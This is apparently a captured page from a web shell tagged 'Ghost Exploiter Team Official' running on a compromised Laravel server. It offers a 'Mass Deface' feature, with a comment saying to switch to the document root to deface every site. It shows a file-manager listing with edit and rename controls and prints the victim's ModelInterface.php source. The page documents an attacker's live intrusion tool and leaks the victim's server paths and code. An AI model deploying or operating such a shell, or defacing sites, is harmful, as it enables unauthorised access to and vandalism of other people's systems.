Ghost Exploiter Team Official
Mass Deface
Directory >>
/
var
/
www
/
html
/
back
/
app
/
Repositories
/
Model
/
Interfaces
/
Mass Deface Auto Detect Domain
/*Ubah Ke document_root untuk mass deface*/
File / Folder
Size
Action
.
-
type
file
dir
+File/Dir
ModelInterface-20260128
...
0.516KB
edt
ren
ModelInterface.php
0.516KB
edt
ren
ModelRepository.php
0KB
edt
ren
PaginationDto.php
0.244KB
edt
ren
ResponseDto.php
1.147KB
edt
ren
<?php namespace App\Repositories\Model\Interfaces; use Illuminate\Support\Collection; interface ModelInterface { public function getAccounts(int $modelId, bool $archive); public function getCashAccounts(int $modelId, bool $isCash); public function getCounterparties(int $modelId, bool $archive); public function getOrganizations(int $modelId, bool $archive); public function getModel(int $modelId); public function getAll(): Collection; public function update(int $modelId, array $data); }
<=Back
Liking